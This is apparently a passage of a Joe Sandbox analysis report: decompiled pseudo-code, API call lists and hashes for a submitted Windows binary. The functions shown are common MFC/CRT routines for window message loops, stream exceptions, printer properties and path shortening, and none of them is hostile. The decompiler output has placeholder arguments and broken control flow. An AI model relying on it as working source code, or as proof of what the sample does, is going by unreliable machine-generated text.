                  					 *(_t130 + 0x70) = _t150;
                  					 *(_t130 + 0x74) = _t150;
                  				}
                  				L6:
                  				 *((intOrPtr*)(_t152 - 0xd8)) = 0x452264;
                  				_t13 = _t152 - 0xd8; // 0x452264
                  				_t135 = _t13;
                  				goto L34;
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00418056
                  • GlobalLock.KERNEL32 ref: 00418077
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00418120
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 0041814C
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 00418171
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                  • String ID: d"E$d"E
                  • API String ID: 569107404-4184370214
                  • Opcode ID: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction ID: 524c0d43197d56bd0e71cd9908d075d591d8cf06ddb31c5e0e4a1a423c794921
                  • Opcode Fuzzy Hash: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction Fuzzy Hash: AC61A4309002199BDB11EFA5CC45BEEBBF4AF04314F14429FE815A72A2DB78DAC5CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E00416F97(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                  				signed int _v8;
                  				char _v9;
                  				char _v268;
                  				struct HWND__* _v272;
                  				signed int _v276;
                  				long _v280;
                  				struct HWND__* _v284;
                  				intOrPtr _v288;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t36;
                  				signed int _t53;
                  				intOrPtr _t56;
                  				long _t59;
                  				struct HWND__* _t62;
                  				CHAR* _t63;
                  				void* _t64;
                  				void* _t66;
                  				void* _t70;
                  				void* _t71;
                  				long _t72;
                  				void* _t73;
                  				void* _t74;
                  				signed int _t76;
                  				void* _t77;
                  				signed int _t81;
                  
                  				_t70 = __edx;
                  				_t79 = _t81;
                  				_t36 =  *0x463404; // 0x18eab29f
                  				_v8 = _t36 ^ _t81;
                  				_t72 = _a4;
                  				_t76 = 0;
                  				_v288 = _a8;
                  				E00416EAC(0);
                  				_t66 = _t71;
                  				_t62 = E00416EE5(0,  &_v272);
                  				_v284 = _t62;
                  				if(_t62 != _v272) {
                  					EnableWindow(_t62, 1);
                  				}
                  				_v280 = _v280 & _t76;
                  				GetWindowThreadProcessId(_t62,  &_v280);
                  				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
                  					L7:
                  					__eflags = _t72;
                  					if(__eflags != 0) {
                  						_t76 = _t72 + 0x78;
                  					}
                  					goto L9;
                  				} else {
                  					_t59 = SendMessageA(_t62, 0x376, 0, 0);
                  					if(_t59 == 0) {
                  						goto L7;
                  					} else {
                  						_t76 = _t59;
                  						L9:
                  						_v276 = _v276 & 0x00000000;
                  						if(_t76 != 0) {
                  							_v276 =  *_t76;
                  							_t56 = _a16;
                  							if(_t56 != 0) {
                  								 *_t76 = _t56 + 0x30000;
                  							}
                  						}
                  						if((_a12 & 0x000000f0) == 0) {
                  							_t53 = _a12 & 0x0000000f;
                  							if(_t53 <= 1) {
                  								_t23 =  &_a12;
                  								 *_t23 = _a12 | 0x00000030;
                  								__eflags =  *_t23;
                  							} else {
                  								if(_t53 + 0xfffffffd <= 1) {
                  									_a12 = _a12 | 0x00000020;
                  								}
                  							}
                  						}
                  						_v268 = 0;
                  						_t96 = _t72;
                  						if(_t72 == 0) {
                  							_t63 =  &_v268;
                  							_t72 = 0x104;
                  							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
                  							if(__eflags == 0) {
                  								_v9 = 0;
                  							}
                  						} else {
                  							_t63 =  *(_t72 + 0x50);
                  						}
                  						_push(_a12);
                  						_push(_t63);
                  						_push(_v288);
                  						_push(_v284);
                  						_t73 = E0040D53F(_t63, _t66, _t72, _t76, _t96);
                  						if(_t76 != 0) {
                  							 *_t76 = _v276;
                  						}
                  						if(_v272 != 0) {
                  							EnableWindow(_v272, 1);
                  						}
                  						E00416EAC(1);
                  						_pop(_t74);
                  						_pop(_t77);
                  						_pop(_t64);
                  						return E00430650(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
                  					}
                  				}
                  			}

                  APIs
                    • Part of subcall function 00416EE5: GetParent.USER32(?), ref: 00416F39
                    • Part of subcall function 00416EE5: GetLastActivePopup.USER32(?), ref: 00416F4A
                    • Part of subcall function 00416EE5: IsWindowEnabled.USER32(?), ref: 00416F5E
                    • Part of subcall function 00416EE5: EnableWindow.USER32(?,00000000), ref: 00416F71
                  • EnableWindow.USER32(?,00000001), ref: 00416FE4
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416FF8
                  • GetCurrentProcessId.KERNEL32(?,?), ref: 00417002
                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041701A
                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 00417094
                  • EnableWindow.USER32(00000000,00000001), ref: 004170D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction ID: b4bc687f8c3733e7692b145a2cdb5596cc84dfbc90c2c000e693f98fe407a247
                  • Opcode Fuzzy Hash: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction Fuzzy Hash: 9C41D432A043189BDB218F25CC42BDABBB4FB59710F1405AAF555A7280D7B5DEC08F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00402D20(void* __ecx, signed int _a4, char _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v40;
                  				char _v44;
                  				void* _v84;
                  				char _v88;
                  				char _v108;
                  				char _v112;
                  				void* _v152;
                  				char _v156;
                  				signed int _t30;
                  				signed int _t34;
                  				signed char _t48;
                  				void* _t60;
                  
                  				_push(0xffffffff);
                  				_push(E0044A998);
                  				_push( *[fs:0x0]);
                  				_t30 =  *0x463404; // 0x18eab29f
                  				_push(_t30 ^ _t60 - 0x00000088);
                  				 *[fs:0x0] =  &_v12;
                  				_t34 = _a4 & 0x00000017;
                  				 *(__ecx + 8) = _t34;
                  				_t48 =  *(__ecx + 0xc) & _t34;
                  				if(_t48 != 0) {
                  					if(_a8 != 0) {
                  						E00430CF4(0, 0);
                  					}
                  					_t65 = _t48 & 0x00000004;
                  					if((_t48 & 0x00000004) != 0) {
                  						E00402CE0( &_v108, "ios_base::badbit set");
                  						_v8 = 0;
                  						E00402BA0(_t65,  &_v112);
                  						_t48 =  &_v156;
                  						_v156 = 0x44f0a8;
                  						E00430CF4(_t48, 0x45ad90);
                  					}
                  					_t66 = _t48 & 0x00000002;
                  					if((_t48 & 0x00000002) != 0) {
                  						E00402CE0( &_v108, "ios_base::failbit set");
                  						_v8 = 1;
                  						E00402BA0(_t66,  &_v112);
                  						_v156 = 0x44f0a8;
                  						E00430CF4( &_v156, 0x45ad90);
                  					}
                  					E00402CE0( &_v40, "ios_base::eofbit set");
                  					_v8 = 2;
                  					E00402BA0(_t66,  &_v44);
                  					_v88 = 0x44f0a8;
                  					_t34 = E00430CF4( &_v88, 0x45ad90);
                  				}
                  				 *[fs:0x0] = _v12;
                  				return _t34;
                  			}

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00402D6F
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • __CxxThrowException@8.LIBCMT ref: 00402DB2
                  • __CxxThrowException@8.LIBCMT ref: 00402DF5
                  • __CxxThrowException@8.LIBCMT ref: 00402E33
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 3476068407-1866435925
                  • Opcode ID: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction ID: 6733c9bcb70d95c348e19533369f8285caa6829711c6102e50207661ceb21adc
                  • Opcode Fuzzy Hash: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction Fuzzy Hash: 20219371058340AED365DB14C956F9EB7E4BF84704F508A2EF489522C2DBBC940CCB2B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E004042A0(void* __ecx) {
                  				void* __ebx;
                  				void* _t23;
                  				void* _t37;
                  				void* _t38;
                  				intOrPtr* _t51;
                  				void* _t52;
                  				void* _t53;
                  				void* _t54;
                  
                  				_t23 = E0040EE3C(_t37, __ecx,  *((intOrPtr*)(_t54 + 0x18)));
                  				_t51 =  *((intOrPtr*)(_t54 + 0x20));
                  				_t38 = _t23;
                  				do {
                  					_t53 = 0;
                  					_t3 = _t53 + 5; // 0x5
                  					_t52 = _t3;
                  					do {
                  						if(_t51 == 0) {
                  							L6:
                  							if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  								_push(0);
                  								_push(_t52);
                  								_push(0x401);
                  								if(_t51 != 0) {
                  									PostMessageA( *(_t38 + 0x20), ??, ??, ??);
                  								} else {
                  									SendMessageA( *(_t38 + 0x20), ??, ??, ??);
                  								}
                  							}
                  							Sleep( *(_t54 + 0x24) * 0x32);
                  							goto L11;
                  						} else {
                  							if(WaitForSingleObject( *(_t51 + 0x18), 0) == 0) {
                  								if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  									PostMessageA( *(_t38 + 0x20), 0x401, 0, 0);
                  								}
                  								return 0;
                  							} else {
                  								if(WaitForSingleObject( *(_t51 + 0x10), 0) != 0) {
                  									goto L6;
                  								} else {
                  									 *((intOrPtr*)(_t54 + 0x14)) =  *_t51;
                  									 *((intOrPtr*)(_t54 + 0x18)) =  *((intOrPtr*)(_t51 + 4));
                  									_t53 = 1;
                  								}
                  								goto L11;
                  							}
                  						}
                  						L21:
                  						L11:
                  						_t52 = _t52 + 5;
                  					} while (_t52 < 0x64);
                  					if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  						_push(0);
                  						_push(0x64);
                  						_push(0x401);
                  						if(_t51 != 0) {
                  							PostMessageA( *(_t38 + 0x20), ??, ??, ??);
                  						} else {
                  							SendMessageA( *(_t38 + 0x20), ??, ??, ??);
                  						}
                  					}
                  				} while (_t53 != 0);
                  				_t19 = _t53 + 1; // 0x1
                  				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x1c)))) =  *((intOrPtr*)(_t54 + 0x14)) +  *((intOrPtr*)(_t54 + 0x18));
                  				return _t19;
                  				goto L21;
                  			}

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                  • SendMessageA.USER32(?,00000401,00000005,00000000), ref: 00404313
                  • PostMessageA.USER32 ref: 0040431F
                  • Sleep.KERNEL32(?,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 0040432D
                  • SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • PostMessageA.USER32 ref: 0040435F
                  • PostMessageA.USER32 ref: 00404399
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Post$ObjectSendSingleWait$Sleep
                  • String ID:
                  • API String ID: 2464283338-0
                  • Opcode ID: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction ID: e8d374fd60e575347347b4847cbe04a4b6a9ea2e9a853ff6579190935c6ace5b
                  • Opcode Fuzzy Hash: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction Fuzzy Hash: 8B31AAB5304300ABD720CF61D888B6B77A4FBC8740F21492EFA45AB2D0C774E801CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00414F48(void* __ecx, char* _a4) {
                  				void* _v8;
                  				void* _t15;
                  				void* _t20;
                  				void* _t35;
                  
                  				_push(__ecx);
                  				_t35 = __ecx;
                  				_t15 =  *(__ecx + 0x74);
                  				if(_t15 != 0) {
                  					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                  					if(_t15 == 0) {
                  						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                  						if(_t15 != 0) {
                  							_t18 =  *(_t35 + 0x70);
                  							if( *(_t35 + 0x70) != 0) {
                  								E0041FD19(_t18);
                  							}
                  							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                  							 *(_t35 + 0x70) = _t20;
                  							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                  								E0041FD19( *(_t35 + 0x70));
                  								 *(_t35 + 0x70) = 0;
                  							}
                  							_t15 = ClosePrinter(_v8);
                  						}
                  					}
                  				}
                  				return _t15;
                  			}








                  APIs
                  • GlobalLock.KERNEL32 ref: 00414F67
                  • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00410705,?), ref: 00414F73
                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414F85
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414FA5
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00414FAD
                  • GlobalLock.KERNEL32 ref: 00414FB7
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FC4
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FDC
                    • Part of subcall function 0041FD19: GlobalFlags.KERNEL32(?), ref: 0041FD28
                    • Part of subcall function 0041FD19: GlobalUnlock.KERNEL32(?,?,00414FD6,?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705), ref: 0041FD3A
                    • Part of subcall function 0041FD19: GlobalFree.KERNEL32 ref: 0041FD45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction ID: 948f0dece0448d59d7c1233082a5740d041519e2e2aed2f4fe9fb02b6f449665
                  • Opcode Fuzzy Hash: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction Fuzzy Hash: 5811CE79600604BBDB229BB6DC49CBF7EEDFBC5704710042AFA06D2221D739CA42D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040E9F9(intOrPtr* __ecx, signed int _a4) {
                  				int _v8;
                  				int _v12;
                  				int _v16;
                  				struct tagMSG* _v20;
                  				struct HWND__* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t48;
                  				struct tagMSG* _t49;
                  				signed int _t51;
                  				void* _t54;
                  				void* _t56;
                  				int _t59;
                  				long _t62;
                  				signed int _t66;
                  				void* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr* _t74;
                  
                  				_t70 = __ecx;
                  				_t74 = __ecx;
                  				_v16 = 1;
                  				_v12 = 0;
                  				if((_a4 & 0x00000004) == 0) {
                  					L2:
                  					_v8 = 0;
                  					L3:
                  					_t48 = GetParent( *(_t74 + 0x20));
                  					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
                  					_v24 = _t48;
                  					_t49 = E00415AE2(_t76);
                  					_t69 = UpdateWindow;
                  					_v20 = _t49;
                  					while(1) {
                  						_t77 = _v16;
                  						if(_v16 == 0) {
                  							goto L15;
                  						}
                  						while(1) {
                  							L15:
                  							_t51 = E00416049(_t70, 0, _t74, _t77);
                  							if(_t51 == 0) {
                  								break;
                  							}
                  							if(_v8 != 0) {
                  								_t59 = _v20->message;
                  								if(_t59 == 0x118 || _t59 == 0x104) {
                  									E00412C34(_t74, 1);
                  									UpdateWindow( *(_t74 + 0x20));
                  									_v8 = 0;
                  								}
                  							}
                  							_t71 = _t74;
                  							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
                  							_t82 = _t54;
                  							if(_t54 == 0) {
                  								_t45 = _t74 + 0x3c;
                  								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
                  								__eflags =  *_t45;
                  								return  *((intOrPtr*)(_t74 + 0x44));
                  							} else {
                  								_push(_v20);
                  								_t56 = E00415EC6(_t69, _t71, 0, _t74, _t82);
                  								_pop(_t70);
                  								if(_t56 != 0) {
                  									_v16 = 1;
                  									_v12 = 0;
                  								}
                  								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
                  									while(1) {
                  										_t77 = _v16;
                  										if(_v16 == 0) {
                  											goto L15;
                  										}
                  										goto L4;
                  									}
                  								}
                  								continue;
                  							}
                  						}
                  						_push(0);
                  						E00414E3D();
                  						return _t51 | 0xffffffff;
                  						L4:
                  						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
                  						if(__eflags != 0) {
                  							goto L15;
                  						} else {
                  							__eflags = _v8;
                  							if(_v8 != 0) {
                  								_t70 = _t74;
                  								E00412C34(_t74, 1);
                  								UpdateWindow( *(_t74 + 0x20));
                  								_v8 = 0;
                  							}
                  							__eflags = _a4 & 0x00000001;
                  							if((_a4 & 0x00000001) == 0) {
                  								__eflags = _v24;
                  								if(_v24 != 0) {
                  									__eflags = _v12;
                  									if(_v12 == 0) {
                  										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
                  									}
                  								}
                  							}
                  							__eflags = _a4 & 0x00000002;
                  							if(__eflags != 0) {
                  								L13:
                  								_v16 = 0;
                  								continue;
                  							} else {
                  								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
                  								_v12 = _v12 + 1;
                  								__eflags = _t62;
                  								if(__eflags != 0) {
                  									continue;
                  								}
                  								goto L13;
                  							}
                  						}
                  					}
                  				}
                  				_t66 = E00412B38(__ecx);
                  				_v8 = 1;
                  				_t76 = _t66 & 0x10000000;
                  				if((_t66 & 0x10000000) == 0) {
                  					goto L3;
                  				}
                  				goto L2;
                  			}
























                  APIs
                  • GetParent.USER32(?), ref: 0040EA2C
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA50
                  • UpdateWindow.USER32(?), ref: 0040EA6B
                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 0040EA8C
                  • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 0040EAA4
                  • UpdateWindow.USER32(?), ref: 0040EAE7
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EB18
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction ID: 9cec2da762fcf1ae17ec792ded61e67ab4686bf0a0b4de212a99b23e2336cc78
                  • Opcode Fuzzy Hash: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction Fuzzy Hash: C5418D30A00245ABCB21DFA7C944AAFBFB4FF85704F10892EE541B22E1D7799950CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E004268B6(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t32;
                  				void* _t34;
                  				intOrPtr _t35;
                  				char* _t36;
                  				int _t38;
                  				CHAR* _t40;
                  				CHAR* _t47;
                  				void* _t49;
                  				void* _t51;
                  				intOrPtr _t54;
                  				intOrPtr _t57;
                  				intOrPtr _t61;
                  				void* _t62;
                  				CHAR* _t64;
                  				void* _t66;
                  				int _t67;
                  				intOrPtr _t68;
                  
                  				_t62 = __edx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_push(_t49);
                  				_push(_t66);
                  				_t64 = _a4;
                  				_push(0xffffffff);
                  				_t32 = E00424A91(_t64);
                  				_t76 = _t32;
                  				if(_t32 == 0) {
                  					E00406436(_t49, __ecx, _t64, _t66, _t76);
                  				}
                  				_t67 = lstrlenA(_t64);
                  				_v8 = _t67;
                  				_t34 = E0042FDDC(_t64, 0, 0);
                  				_t57 = _v8;
                  				_t51 = _t34 - 1;
                  				_t68 = _t67 - _t51;
                  				_t35 = _t68 + _t64;
                  				_v12 = _t35;
                  				if(_a8 < _t57) {
                  					if(_a8 >= _t51) {
                  						__eflags =  *_t64 - 0x5c;
                  						_t36 =  &(_t64[2]);
                  						_a4 = _t36;
                  						if( *_t64 == 0x5c) {
                  							__eflags = _t64[1] - 0x5c;
                  							if(_t64[1] == 0x5c) {
                  								while(1) {
                  									__eflags =  *_t36 - 0x5c;
                  									if( *_t36 == 0x5c) {
                  										goto L13;
                  									}
                  									_t36 = E004348EB(_t62, _t64, _a4);
                  									_a4 = _t36;
                  								}
                  							}
                  						}
                  						L13:
                  						__eflags = _t68 - 3;
                  						if(_t68 > 3) {
                  							do {
                  								_t47 = E004348EB(_t62, _t64, _a4);
                  								__eflags =  *_t47 - 0x5c;
                  								_a4 = _t47;
                  							} while ( *_t47 != 0x5c);
                  						}
                  						_t68 = _a4 - _t64;
                  						__eflags = _a8 - _t68 + _t51 + 5;
                  						if(_a8 >= _t68 + _t51 + 5) {
                  							while(1) {
                  								_t38 = lstrlenA(_a4);
                  								__eflags = _t38 + _t68 + 4 - _a8;
                  								if(_t38 + _t68 + 4 > _a8) {
                  									goto L18;
                  								} else {
                  									break;
                  								}
                  								do {
                  									L18:
                  									_t40 = E004348EB(_t62, _t64, _a4);
                  									__eflags =  *_t40 - 0x5c;
                  									_a4 = _t40;
                  								} while ( *_t40 != 0x5c);
                  							}
                  							__eflags = _t68;
                  							if(_t68 < 0) {
                  								L22:
                  								_t68 = _a8;
                  							} else {
                  								__eflags = _t68 - _a8;
                  								if(_t68 >= _a8) {
                  									goto L22;
                  								}
                  							}
                  							_t54 = _v8;
                  							E004059F9(_t64, _t68 + _t64, _t68 + _t64, _t54 - _t68 + 1, "\\...", 5);
                  							__eflags = _t54 + 1;
                  							_t35 = E0040490E(_t54 + 1, _t62, _t64, _t68 + _t64, _t64, _t54 + 1, _a4);
                  						} else {
                  							_push(_v12);
                  							_push(_v8 + 1);
                  							goto L7;
                  						}
                  					} else {
                  						if(_a12 != 0) {
                  							_push(_t35);
                  							_t61 = _t57 + 1;
                  							__eflags = _t61;
                  							_push(_t61);
                  							L7:
                  							_push(_t64);
                  							_t35 = E00414FEE(_t51, _t62, _t64, _t68);
                  						} else {
                  							 *_t64 = 0;
                  						}
                  					}
                  				}
                  				return _t35;
                  			}



























                  APIs
                  • lstrlenA.KERNEL32(?,?,000000FF), ref: 004268D5
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00414FEE: _strcpy_s.LIBCMT ref: 00414FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                  • String ID: \...
                  • API String ID: 2411880420-1167917071
                  • Opcode ID: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction ID: 209274568c99b8f927e6ccd35cc04ed4cda3847a283bcf010ece59bbc5279a2f
                  • Opcode Fuzzy Hash: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction Fuzzy Hash: 1A311BB1A00269BFDF119F15DC40AAE7B64EB41358F52812FFC159B241DB389EC1CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040EF7F(intOrPtr* __ecx) {
                  				struct HWND__* _v40;
                  				struct HWND__* _v44;
                  				intOrPtr _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t34;
                  				long _t43;
                  				struct HWND__* _t48;
                  				intOrPtr* _t63;
                  				signed int _t64;
                  				void* _t69;
                  				intOrPtr _t71;
                  				intOrPtr* _t72;
                  
                  				_t72 = __ecx;
                  				_t69 = E00415AD9();
                  				if(_t69 != 0) {
                  					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                  						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                  					}
                  					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                  						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                  					}
                  				}
                  				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                  				if(_t63 != 0) {
